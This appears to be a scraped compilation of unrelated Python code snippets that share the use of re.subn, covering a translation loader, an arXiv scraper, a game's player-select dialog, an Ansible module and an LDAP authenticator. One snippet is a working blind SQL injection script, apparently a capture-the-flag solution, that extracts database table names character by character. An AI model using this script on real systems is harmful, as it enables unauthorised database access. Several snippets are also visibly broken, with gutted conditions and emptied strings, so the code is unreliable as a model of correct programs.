re.findall(r"^o\d+[ ]", data, re.M|re.S) grps2 = re.findall(r"^t\d+[ ]", data, re.M|re.S) log.warning(" Unpaired original and translated strings. %s is longer (oXX: %s, tXX: %s)."%({True: "tXX", False: "oXX"}[len(grps1) < len(grps2)], len(grps1), len(grps2))) bugStrs = [] def compLists(lst1, lst1N, lst2, lst2N, repl, bugStrs=bugStrs): bug = [] for item in lst1: itm = repl + item[1:] if itm in lst2: idx = lst2.index(itm) lst2.pop(idx) else: bug.append(item) bugStrs += ["Not found in %s"%lst1N, bug] bugStrs += ["Not found in %s"%lst2N, lst2] if len(grps1) < len(grps2): compLists(grps1, "grps1", grps2, "grps2", u"t") log.warning(" Compared oXX tXX:") log.warning(" %s"%bugStrs) else: compLists(grps2, "grps2", grps1, "grps1", u"o") log.warning(" Compared tXX oXX:") log.warning(" %s"%bugStrs) return {}, False n1 = len(grps) / 2 result = u"" n = 1 n2 = 0 r = u"" + data.replace(u"\\", u"\\\\").replace(u"\"", u'\\"').replace(u"\r\n", u"\n").replace(u"\r", u"\n") log.debug(" Replacing oXX/tXX.") while n: r, n = re.subn(r"^o\d+[ ]|\no\d+[ ]", "\",\"", r, flags=re.M|re.S) r, n = re.subn(r"^t\d+[ ]|\nt\d+[ ]", "\":\"", r, flags=re.M|re.S) n2 += n if n2 == n1: n = 0 log.debug(" Replaced %s occurences."%n2) result += r[2:] result = u"{" + result.replace(u"\r\n", u"\\n").replace(u"\n", u"\\n").replace(u"\t", u"\\t") + u"\"}" log.debug(" Conversion done. Loading JSON resource.") try: str_cache = json.loads(result) if extend: string_cache.update([(a, b) for (a, b) in str_cache.items() if a not in string_cache.keys()]) except Exception as e: log.debug("Error while loading JSON resource:") log.debug(" %s"%e) log.debug("Dumping JSON data in %s.json"%lang) f = open('%s.json'%lang, 'w') f.write(result) f.close() return {}, False # log.debug(" Setting up font.") # Forgotten this here??? if not extend: line = rawData.splitlines()[0] if "#-# " in line: lngNm = line.split("#-# ")[1].strip() else: lngNm = os.path.splitext(os.path.basename(fName))[0] try: resource.setCurLang(lngNm) except: resource.__curLang = lngNm tm1 = time() log.debug(" * End on %s duration %s"%(tm, tm1 - tm)) else: log.debug("fName is not valid beacause:") if not os.access(fName, os.F_OK): log.debug(" * Can't access file.") if not os.path.isfile(fName): log.debug(" * It's not a file.") if not os.access(fName, os.R_OK): log.debug(" * Is not readable.") log.debug("Default strings will be used.") str_cache = {} if not extend: string_cache = str_cache log.debug("buildTranslation >>>") return string_cache, fileFound
def replaceContraction(text): patterns = [(re.compile(regex), repl) for (regex, repl) in contraction_patterns] for (pattern, repl) in patterns: (text, count) = re.subn(pattern, repl, text) return text
def save_files_generic(self): ##### from digits.job_client import ssd_pascal ############## parameters ############# # Add non-data layers job_path = self.path(self.train_val_file) solver_file = self.path('solver.prototxt') train_net_path = self.path('train_val.prototxt') test_net_path = self.path('test.prototxt') snapshot_path = self.path('VOC_Snapshot') train_data_path = self.data_dir+'/'+'VOC0712_trainval_lmdb' test_data_path = self.data_dir+'/'+'VOC0712_test_lmdb' label_map_file = self.data_dir+'/'+'labelmap_voc.prototxt' name_size_file = self.data_dir+'/'+'test_name_size.txt' output_result_dir = self.data_dir+'/'+'Main' iter_size = self.batch_accumulation / self.batch_size ################ end ################## print '----------------------------------------------' print 'train_ssd' print '----------------------------------------------' ############## train_net ############## # ssd_pascal.CreateTrainNet(train_net_path, train_data_path, self.batch_size) ###directly edit on custom network text form page network_test, n = re.subn('(?<=source:)(.+)?(?=\n)', '"'+train_data_path+'"', self.network_text) # print (network_test) f = open(train_net_path, 'w') f.write(network_test) f.close() ################ end ################## ############### test_net ############## # print 'create test.prototxt' # ssd_pascal.CreateTestNet(test_net_path, test_data_path, self.test_batch_size, # label_map_file, name_size_file, output_result_dir) ################# end ################# ############## ssd solver ############# solver = caffe_pb2.SolverParameter() # solver.max_iter = 120000 solver.max_iter = self.max_iter_num self.solver = solver # Create solver ssd_pascal.CreateSolver(solver_file, train_net_path, test_net_path, snapshot_path, self.learning_rate, iter_size, self.solver_type) ################### end ############### ############## deploy_net ############# deploy_network = caffe_pb2.NetParameter() # Write to file with open(self.path(self.deploy_file), 'w') as outfile: text_format.PrintMessage(deploy_network, outfile) with open(self.path('original.prototxt'), 'w') as outfile: text_format.PrintMessage(deploy_network, outfile) ################# end ################# ############## snapshot ############## solver.snapshot_prefix = self.snapshot_prefix snapshot_interval = self.snapshot_interval * ( solver.max_iter / self.train_epochs ) if 0 < snapshot_interval <= 1: solver.snapshot = 1 # don't round down elif 1 < snapshot_interval < solver.max_iter: solver.snapshot = int(snapshot_interval) else: solver.snapshot = 0 # only take one snapshot at the end ################# end ################# return True
def _nameify(in_str): name = ''.join( c if c.isalnum() else '-' for c in in_str.lower() ).strip('-') return re.subn(r'\-+', '-', name)[0]
def new_submission(url, mode=1, samedate=False): """ fetching new submission everyday :param url: string, the url for the new page of certain category :param mode: int, 0 for new, 1 for cross, 2 for both :param samedate: boolean, if true, there is a check to make sure the submission is for today :return: list of dict, containing all papers """ pa = requests.get(url) so = BeautifulSoup(pa.text, "lxml") if samedate is True: date_filter = re.compile(r"^New submissions for ([a-zA-Z]+), .*") try: weekdaystr = date_filter.match(so("h3")[0].string).group(1) except AttributeError: return [] if weekdaylist[] != weekdaystr: return [] submission_pattern = re.compile(r"(.*) for .*") submission_list = so("h3") submission_dict = {} for s in submission_list: dict_key = submission_pattern.match(s.string).group(1) submission_dict[dict_key] = True if mode == 0 and submission_dict.get("New submissions", False): newc = so("dl")[0] elif mode == 1 and submission_dict.get("Cross-lists", False): newc = so("dl")[1] elif submission_dict.get("New submissions", False) and submission_dict.get( "Cross-lists", False): newc = BeautifulSoup(str(so("dl")[0]) + str(so("dl")[1]), "lxml") else: return [] newno = len(newc("span", class_="list-identifier")) contents = [] subjectabbr_filter = re.compile(r"^.*[(](.*)[)]") for i in range(newno): content = {} id_ = list(newc("span", class_="list-identifier")[i].children)[0].text content["arxiv_id"] = re.subn(r"arXiv:", "", id_)[0] content["arxiv_url"] = "" + content["arxiv_id"] title = newc("div", class_="list-title mathjax")[i].text content["title"] = re.subn(r"\n|Title: ", "", title)[0] author = newc("div", class_="list-authors")[i].text content["authors"] = [ re.subn(r"\n|Authors:", "", author)[0].strip() for author in author.split(",") ] subject = newc("div", class_="list-subjects")[i].text content["subject"] = [ re.subn(r"\n|Subjects: ", "", sub.strip())[0] for sub in subject.split(r";") ] content["subject_abbr"] = [ subjectabbr_filter.match(d).group(1) for d in content["subject"] ] abstract = newc("p", class_="mathjax")[i].text content["summary"] = re.subn(r"\n", " ", abstract)[0] content["announce_date"] ="%Y-%m-%d") contents.append(content) return contents
#encoding=utf8 import requests, re sql = "select table_name from information_schema.tables limit 60,1" #WEEK44SQLIII FLLLLLAG sql = re.subn('\s', chr(10), sql)[0] hex_range = [i for i in range(130) if i != 37 and i != 95] evalstr = '' strlist = [] for str_len in range(1, 20): for i in hex_range: if str_len == 1: params = { "user": r"a\'or(Lpad(({}),1,1)like({}))#".format(sql, hex(i)) } r = requests.get("", params=params) if r.text[:5] == 'admin': strlist.append(i) break else: params = { "user": r"a\'or(Lpad(({}),{},1)like({}))#".format( sql, str_len, hex_str + hex(i)[2:]) } r = requests.get("", params=params) if r.text[:5] == 'admin': strlist.append(i)
def assertEqualNoWhitespace(self, a, b): remove_whitespace = lambda s: re.subn(r'[\s\n]', '', s)[0] self.assertEqual(remove_whitespace(a), remove_whitespace(b))
<_sre.SRE_Match object; span=(1, 2), match='h'> >>>"h","Hhelhlo"[2:0]) >>> re.findall("h","Hhelhlo") ['h', 'h'] >>> for match in re.finditer("h","Hhelhlo"): ... print(match) ... <_sre.SRE_Match object; span=(1, 2), match='h'> <_sre.SRE_Match object; span=(4, 5), match='h'> >>> re.sub("h","8","Hhelhlo") 'H8el8lo' >>> re.subn("h","8","Hhelhlo",1) ('H8elhlo', 1) >>> re.subn("h","8","Hhelhlo",1,re.IGNORECASE) ('8helhlo', 1) >>> re.subn("h","8","Hhelhlo",re.IGNORECASE) ('H8el8lo', 2) >>> re.sub("h","8","Hhelhlo",re.IGNORECASE) 'H8el8lo' >>> re.sub("h","8","Hhelhlo",3,re.IGNORECASE) '88el8lo' >>> re.subn("h","8","Hhelhlo",3,re.IGNORECASE)
} return res.join(''); }""" METHODS['upper'] = """function () { // nargs: 0 if (this.constructor !== String) return this.KEY.apply(this, arguments); return this.toUpperCase(); }""" METHODS['zfill'] = """function (width) { // nargs: 1 if (this.constructor !== String) return this.KEY.apply(this, arguments); return METHOD_PREFIXrjust(this, width, '0'); }""" for key in METHODS: METHODS[key] = re.subn(r'METHOD_PREFIX(.+?)\(', r'METHOD_PREFIX\', METHODS[key])[0] METHODS[key] = METHODS[key].replace( 'KEY', key).replace( 'FUNCTION_PREFIX', FUNCTION_PREFIX).replace( 'METHOD_PREFIX', METHOD_PREFIX).replace( ', )', ')') for key in FUNCTIONS: FUNCTIONS[key] = re.subn(r'METHOD_PREFIX(.+?)\(', r'METHOD_PREFIX\', FUNCTIONS[key])[0] FUNCTIONS[key] = FUNCTIONS[key].replace( 'KEY', key).replace( 'FUNCTION_PREFIX', FUNCTION_PREFIX).replace( 'METHOD_PREFIX', METHOD_PREFIX)
def sanitize(hostname: str) -> str: return re.subn("[\s\.]+", "", hostname.lower())[0]
def remove_strings_with_pattern(self, content, pattern): result, number = re.subn(pattern, '', content) return result
def update(self): now = time.time() if now - self._last_modified < 1: if self.verbose: print(f'{self.md_file} is likely up-to-date') return if self.verbose: print(f'{self.md_file} processing') prev_image_files = self.image_files.copy() self.image_files.clear() f = open(self.md_file) orig_content = f.close() if not orig_content: if self.verbose: print('Got empty content. Sleeping 1 sec and try again.') time.sleep(1) f = open(self.md_file) orig_content = f.close() if not orig_content: print('Empty file. Skip update!') return content = orig_content if content.find(header.split(None, 1)[0]) == -1: content = header + '\n' + content if not content.rstrip().endswith('<!--EOF-->'): content += '\n<!--EOF-->' elif not content.rstrip().endswith('<!--EOF-->'): print('Expected <!--EOF--> at the end of file. Skip update!') return if self.parent.run_pandoc: f = open(self.html_file, 'w') f.write(''' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <html xmlns=""> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="refresh" content="0.5" /> <meta name="generator" content="" /> <title>Wait...</title> <style type="text/css">code{white-space: pre;}</style> </head> <body> <h1>Please wait until updates %s...</h1> <h2>The page will reload automatically.</h2> </body> </html> ''' % (self.html_file)) f.close() if 'watch-latex-md:force-rerender' in content: print('Setting force-rerender') self._force_rerender = True self.equation_counter = 0 self.label_counter = {} for pattern, repl in [ (r'(?m)(?P<latex>[$]+[^$]+[$]+)', self.latex_to_img), ((r'(?m)([<]img\s+data[-]latex=["]\s*)(?P<latex>.*?)' r'["]\s+src=.*?\s+alt="latex">'), self.img_to_svg), ((r'(\[(?P<title>[^]]+)\][(][#](?P<label>[^)]+)[)])'), self.update_label_title)]: content, _count = re.subn( pattern, repl, content, flags=re.S ) if self.force_rerender or content != orig_content: f = open(self.md_file, 'w') f.write(content) f.close() self._last_modified = time.time() if self.verbose: print(f'{self.md_file} is updated') else: if self.verbose: print(f'{self.md_file} is up-to-date') self._force_rerender = False if self.parent.run_pandoc: try: check_output( ['pandoc', '-f', 'gfm', '-t', 'html', '--metadata', 'title=' + os.path.basename(self.md_file), '-s', self.md_file, '-o', self.html_file], stderr=sys.stdout) except Exception as msg: print(f'{self.md_file} pandoc failed: {msg}') else: if self.verbose: print(f'{self.html_file} is generated') new_files = list(self.image_files.difference(prev_image_files)) obsolete_files = list(prev_image_files.difference(self.image_files)) if self.use_git: for fn in new_files: if not self.git_check_added(fn): self.git_add_file(fn) for fn in obsolete_files: if self.git_check_added(fn): self.git_rm_file(fn) else: self.rm_file(fn) else: if self.git_check_repo(): for fn in obsolete_files: if self.git_check_added(fn): print(f'{fn} is obsolete in git repo ' '[use --git to enable auto-removal]') else: self.rm_file(fn) else: for fn in obsolete_files: self.rm_file(fn)
def OnGUINotify(self, id, control, event): global gIsExplorer global gSelectedSlot global gPlayerList global gExp_HotSpot global gMinusExplorer global gMinusVisitor global gClickedWrongSlot #print "xDialogStartUp: GUI Notify id=%d, event=%d control=" % (id,event),control if control: tagID = control.getTagID() ################################# ## Visitor Player List ## ################################# if id == if event == kAction or event == kValueChanged: if tagID == k4aVisitID: ## Visit Uru ## PtHideDialog("GUIDialog04a") PtShowDialog("GUIDialog05") elif tagID == k4aQuitID: ## Quit ## PtYesNoDialog(self.key, "Are you sure you want to quit?") elif tagID == k4aDeleteID: ## Delete Visitor ## print gSelectedSlot print type(gSelectedSlot) if gSelectedSlot: deleteString = U"Would you like to delete the VISITOR " + unicode( gPlayerList[gSelectedSlot - gMinusVisitor][0]) + U"?" ptGUIControlTextBox( GUIDiag4c.dialog.getControlFromTag( k4cStaticID)).setStringW(deleteString) self.PlayerListNotify(GUIDiag4a, gVis_HotSpot, 0) PtShowDialog("GUIDialog04c") ## Or Else?? ## elif tagID == k4aPlayer01: ## Click Event ## if gPlayerList[0]: self.SelectSlot(GUIDiag4a, tagID) else: PtHideDialog("GUIDialog04a") PtShowDialog("GUIDialog06") elif tagID == k4aPlayer02 or tagID == k4aPlayer03 or k4aPlayer04 or k4aPlayer05 or k4aPlayer06: ## Shortcut Skip to Create Visitor ## gClickedWrongSlot = 1 PtHideDialog("GUIDialog04a") PtShowDialog("GUIDialog05") elif event == kInterestingEvent: self.ToggleColor(GUIDiag4a, tagID) ################################# ## Explorer Player List ## ################################# elif id == if event == kAction or event == kValueChanged: if tagID == k4bExploreID: ## Explore Uru ## if gSelectedSlot: PtShowDialog("GUIDialog06a") print "Player selected." # start setting active player (we'll link out when this operation completes) playerID = gPlayerList[gSelectedSlot - gMinusExplorer][1] print "Setting active player." PtSetActivePlayer(playerID) ## Or Else?? ## elif tagID == k4bQuitID: ## Quit ## PtYesNoDialog(self.key, "Are you sure you want to quit?") elif tagID == k4bDeleteID: ## Delete Explorer ## if gSelectedSlot: deleteString = U"Would you like to delete the EXPLORER " + unicode( gPlayerList[gSelectedSlot - gMinusExplorer][0]) + U"?" ptGUIControlTextBox( GUIDiag4c.dialog.getControlFromTag( k4cStaticID)).setStringW(deleteString) self.PlayerListNotify(GUIDiag4b, gExp_HotSpot, 0) PtShowDialog("GUIDialog04c") ## Or Else?? ## elif tagID == k4bPlayer01: ## Click Event ## errorString = "As an URU subscriber, you are an EXPLORER (not a VISITOR) and are free to enjoy complete and unlimited access to URU content." ptGUIControlTextBox( GUIDiag4d.dialog.getControlFromTag( k4dTextID)).setString(errorString) PtShowDialog("GUIDialog04d") self.ToggleColor(GUIDiag4b, k4bPlayer01) self.PlayerListNotify(GUIDiag4b, gExp_HotSpot, 0) elif (tagID == k4bPlayer02 or tagID == k4bPlayer03 or tagID == k4bPlayer04 or tagID == k4bPlayer05 or tagID == k4bPlayer06) and not (tagID == gSelectedSlot): if gPlayerList[tagID - gMinusExplorer]: self.SelectSlot(GUIDiag4b, tagID) else: PtHideDialog("GUIDialog04b") PtShowDialog("GUIDialog06") elif event == kInterestingEvent: ## RollOver Event ## self.ToggleColor(GUIDiag4b, tagID) ################################# ## Delete Player ## ################################# elif id == if event == kAction or event == kValueChanged: if tagID == k4cYesID: ## Confirm Delete ## playerID = 0 if gIsExplorer: playerID = gPlayerList[gSelectedSlot - gMinusExplorer][1] else: playerID = gPlayerList[gSelectedSlot - gMinusVisitor][1] PtDeletePlayer(playerID) elif tagID == k4cNoID: ## Cancel Delete ## if not (gSelectedSlot == k4bPlayer03) or not ( gSelectedSlot == k4aPlayer03): if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) PtHideDialog("GUIDialog04c") if gIsExplorer: self.PlayerListNotify(GUIDiag4b, gExp_HotSpot, 1) else: self.PlayerListNotify(GUIDiag4a, gVis_HotSpot, 1) ################################# ## Not Needed ## ################################# elif id == if event == kAction or event == kValueChanged: if tagID == k4dYesID: ## Continue ## if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) self.PlayerListNotify(GUIDiag4b, gExp_HotSpot, 1) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) self.PlayerListNotify(GUIDiag4a, gVis_HotSpot, 1) PtHideDialog("GUIDialog04d") ptGUIControlButton( GUIDiag6.dialog.getControlFromTag(k6PlayID)).enable() ################################# ## Nag Screen ## ################################# elif id == if event == kAction or event == kValueChanged: if tagID == k5PayID: ## Quit And Register ## WebLaunchCmd( "" ) elif tagID == k5VisitID: ## Continue As Visitor ## if gClickedWrongSlot: gClickedWrongSlot = 0 PtHideDialog("GUIDialog05") PtShowDialog("GUIDialog04a") elif gPlayerList[0]: PtShowDialog("GUIDialog06a") print "Player selected." # start setting active player (we'll link out when this operation completes) playerID = gPlayerList[0][1] print "Setting active player." PtSetActivePlayer(playerID) else: PtHideDialog("GUIDialog05") PtShowDialog("GUIDialog06") elif tagID == k5BackID: ## Back To Player Select ## PtHideDialog("GUIDialog05") PtShowDialog("GUIDialog04a") elif tagID == k5LinkID: ## Link ## WebLaunchCmd( "" ) ################################# ## Create Player ## ################################# elif id == if event == kAction or event == kValueChanged: if tagID == k6QuitID: ## Quit ## PtYesNoDialog(self.key, "Are you sure you want to quit?") elif tagID == k6BackID: ## Back To Player Select ## PtHideDialog("GUIDialog06") if gIsExplorer: PtShowDialog("GUIDialog04b") else: PtShowDialog("GUIDialog04a") elif tagID == k6PlayID: ## Play ## playerName = ptGUIControlEditBox( GUIDiag6.dialog.getControlFromTag( k6NameID)).getString() # <--- playerNameW = ptGUIControlEditBox( GUIDiag6.dialog.getControlFromTag( k6NameID)).getStringW() # <--- inviteCode = ptGUIControlEditBox( GUIDiag6.dialog.getControlFromTag( k6InviteID)).getString() # since the code is in hex we know letters like i, l, and o can't be in the code so try # converting any to 1 or 0 in case the user thought they were the wrong thing inviteCode = inviteCode.lower().replace("i", "1").replace( "l", "1").replace("o", "0") try: playerName == playerNameW except: errorString = "Error, invalid Name. Please enter another." ptGUIControlTextBox( GUIDiag4d.dialog.getControlFromTag( k4dTextID)).setString(errorString) PtShowDialog("GUIDialog04d") if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) return playerGender = "" if ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6MaleID)).isChecked(): playerGender = "male" if ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6FemaleID)).isChecked(): playerGender = "female" if playerName == U"" or playerName == "": errorString = "Error, you must enter a Name." ptGUIControlTextBox( GUIDiag4d.dialog.getControlFromTag( k4dTextID)).setString(errorString) PtShowDialog("GUIDialog04d") if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) elif playerGender == "": errorString = "Error, you must select a gender." ptGUIControlTextBox( GUIDiag4d.dialog.getControlFromTag( k4dTextID)).setString(errorString) PtShowDialog("GUIDialog04d") if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) else: fixedPlayerName = playerName.strip() (fixedPlayerName, whitespacefixedcount) = re.subn( "\s{2,}|[\t\n\r\f\v]", " ", fixedPlayerName) ( fixedPlayerName, RogueCount, ) = re.subn('[\x00-\x1f]', '', fixedPlayerName) if RogueCount > 0 or whitespacefixedcount > 0: if RogueCount > 0: errorString = "Warning, you entered invalid characters in your player name. The invalid characters have been removed, please make sure your player name is still what you want." else: errorString = "Warning, your player name has some incorrect formatting. The formatting has been corrected, please make sure your player name is still what you want." ptGUIControlTextBox( GUIDiag4d.dialog.getControlFromTag( k4dTextID)).setString(errorString) PtShowDialog("GUIDialog04d") if gIsExplorer: self.ToggleColor(GUIDiag4b, k4bPlayer03) else: self.ToggleColor(GUIDiag4a, k4aPlayer03) ptGUIControlEditBox( GUIDiag6.dialog.getControlFromTag( k6NameID)).setString(fixedPlayerName) else: print "Creating Player" PtShowDialog("GUIDialog06a") ptGUIControlButton( GUIDiag6.dialog.getControlFromTag( k6PlayID)).disable() PtCreatePlayer( fixedPlayerName, playerGender, inviteCode ) # <--- elif tagID == k6MaleID: ## Gender Male ## if ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6FemaleID)).isChecked(): ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6FemaleID)).setChecked(0) elif tagID == k6FemaleID: ## Gender Female ## if ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6MaleID)).isChecked(): ptGUIControlCheckBox( GUIDiag6.dialog.getControlFromTag( k6MaleID)).setChecked(0)
def clean_license_name(license_name): """Remove the word ``license`` from the license :param str license_name: Receives the license name :return str: Return a string without the word ``license`` """ return re.subn(r'(.*)\s+license', r'\1', license_name, flags=re.IGNORECASE)[0]
def replace_e1(sentence, e2): result, _ = re.subn(r"<e1>(.+?)</e1>", "<e1>%s</e1>" % e2, sentence) return result
def clearAllHtmlLabel(data): result, number = re.subn("<[\s\S]+?>", '', data) return result
def _pad(s): return re.subn('(\n)', '\n ', s)[0]
def replace_e2(sentence, e1): result, _ = re.subn(r"<e2>(.+?)</e2>", "<e2>%s</e2>" % e1, sentence) return result
def subn(pattern, repl, string, count=0, flags=0): """ subn after parsing unicode properties and set flag to unicode """ re.subn(parse_unicode_properties(pattern), repl, string, flags | re.UNICODE)
def main(): module = AnsibleModule( argument_spec=dict( path=dict(required=True, aliases=['dest', 'destfile', 'name'], type='path'), regexp=dict(required=True), replace=dict(default='', type='str'), after=dict(required=False), before=dict(required=False), backup=dict(default=False, type='bool'), validate=dict(default=None, type='str'), encoding=dict(default='utf-8', type='str'), ), add_file_common_args=True, supports_check_mode=True ) params = module.params path = params['path'] encoding = params['encoding'] res_args = dict() params['after'] = to_text(params['after'], errors='surrogate_or_strict', nonstring='passthru') params['before'] = to_text(params['before'], errors='surrogate_or_strict', nonstring='passthru') params['regexp'] = to_text(params['regexp'], errors='surrogate_or_strict', nonstring='passthru') params['replace'] = to_text(params['replace'], errors='surrogate_or_strict', nonstring='passthru') if os.path.isdir(path): module.fail_json(rc=256, msg='Path %s is a directory !' % path) if not os.path.exists(path): module.fail_json(rc=257, msg='Path %s does not exist !' % path) else: f = open(path, 'rb') contents = to_text(, errors='surrogate_or_strict', encoding=encoding) f.close() pattern = u'' if params['after'] and params['before']: pattern = u'%s(?P<subsection>.*?)%s' % (params['before'], params['after']) elif params['after']: pattern = u'%s(?P<subsection>.*)' % params['after'] elif params['before']: pattern = u'(?P<subsection>.*)%s' % params['before'] if pattern: section_re = re.compile(pattern, re.DOTALL) match =, contents) if match: section ='subsection') else: res_args['msg'] = 'Pattern for before/after params did not match the given file: %s' % pattern res_args['changed'] = False module.exit_json(**res_args) else: section = contents mre = re.compile(params['regexp'], re.MULTILINE) result = re.subn(mre, params['replace'], section, 0) if result[1] > 0 and section != result[0]: if pattern: result = (contents.replace(section, result[0]), result[1]) msg = '%s replacements made' % result[1] changed = True if module._diff: res_args['diff'] = { 'before_header': path, 'before': contents, 'after_header': path, 'after': result[0], } else: msg = '' changed = False if changed and not module.check_mode: if params['backup'] and os.path.exists(path): res_args['backup_file'] = module.backup_local(path) if params['follow'] and os.path.islink(path): path = os.path.realpath(path) write_changes(module, to_bytes(result[0], encoding=encoding), path) res_args['msg'], res_args['changed'] = check_file_attrs(module, changed, msg) module.exit_json(**res_args)
s = "Levi:1994,Sunny:1993" pattern = r"(\w+):(\d+)" #re模块调用 l01 = re.findall(pattern,s) print(l01) #compile对象调用 regex = re.compile(pattern) pos =0 endpos=12 l02 = regex.findall(s,0,12) print(l02) l03 = re.split(r"[^\w]+","how are you l-qwww-1';asds as") print(l03) s = "时间:2020/7/25" ns = re.subn(r"/","-",s) print(ns) s = "2019年建国70周年" pattern = r"\d+" iter01= re.finditer(pattern,s) print(iter01) for i in iter01: print(i, #完全匹配 m= re.fullmatch(r"\w+","hello-1973") print(m) #匹配开始位置 m= re.match(r"[A-Z]\w+","Hello 1973") print( #匹配开始位置第一处 m="\S+","Hello 1973")
def authenticate(self, handler, data): username = data['username'] password = data['password'] # Protect against invalid usernames as well as LDAP injection attacks if not re.match(self.valid_username_regex, username): self.log.warn( 'username:%s Illegal characters in username, must match regex %s', username, self.valid_username_regex) return None # No empty passwords! if password is None or password.strip() == '': self.log.warn('username:%s Login denied for blank password', username) return None if self.lookup_dn: username = self.resolve_username(username) if not username: return None if self.lookup_dn: if str(self.lookup_dn_user_dn_attribute).upper() == 'CN': # Only escape commas if the lookup attribute is CN username = re.subn(r"([^\\]),", r"\1\,", username)[0] bind_dn_template = self.bind_dn_template if isinstance(bind_dn_template, str): # bind_dn_template should be of type List[str] bind_dn_template = [bind_dn_template] is_bound = False for dn in bind_dn_template: if not dn: self.log.warn("Ignoring blank 'bind_dn_template' entry!") continue userdn = dn.format(username=username) if self.escape_userdn: userdn = escape_filter_chars(userdn) msg = 'Attempting to bind {username} with {userdn}' self.log.debug(msg.format(username=username, userdn=userdn)) msg = "Status of user bind {username} with {userdn} : {is_bound}" try: conn = self.get_connection(userdn, password) except ldap3.core.exceptions.LDAPBindError as exc: is_bound = False msg += '\n{exc_type}: {exc_msg}'.format( exc_type=exc.__class__.__name__, exc_msg=exc.args[0] if exc.args else '') else: is_bound = conn.bind() msg = msg.format(username=username, userdn=userdn, is_bound=is_bound) self.log.debug(msg) if is_bound: break if not is_bound: msg = "Invalid password for user '{username}'" self.log.warn(msg.format(username=username)) return None if self.search_filter: search_filter = self.search_filter.format( userattr=self.user_attribute, username=username, ), search_scope=ldap3.SUBTREE, search_filter=search_filter, attributes=self.attributes) n_users = len(conn.response) if n_users == 0: msg = "User with '{userattr}={username}' not found in directory" self.log.warn( msg.format(userattr=self.user_attribute, username=username)) return None if n_users > 1: msg = ("Duplicate users found! " "{n_users} users found with '{userattr}={username}'") self.log.warn( msg.format(userattr=self.user_attribute, username=username, n_users=n_users)) return None if self.allowed_groups: self.log.debug('username:%s Using dn %s', username, userdn) found = False for group in self.allowed_groups: group_filter = ('(|' '(member={userdn})' '(uniqueMember={userdn})' '(memberUid={uid})' ')') group_filter = group_filter.format(userdn=userdn, uid=username) group_attributes = ['member', 'uniqueMember', 'memberUid'] found =, search_scope=ldap3.BASE, search_filter=group_filter, attributes=group_attributes) if found: break if not found: # If we reach here, then none of the groups matched msg = 'username:{username} User not in any of the allowed groups' self.log.warn(msg.format(username=username)) return None if self.use_lookup_dn_username: return username else: return data['username']
def replace(self, text): for parrent, repl in self.parrents: text, count = re.subn(pattern=parrent, repl=repl, string=text) return text
def find_and_remove_repl_patterns(astr): names = find_repl_patterns(astr) astr = re.subn(named_re, '', astr)[0] return astr, names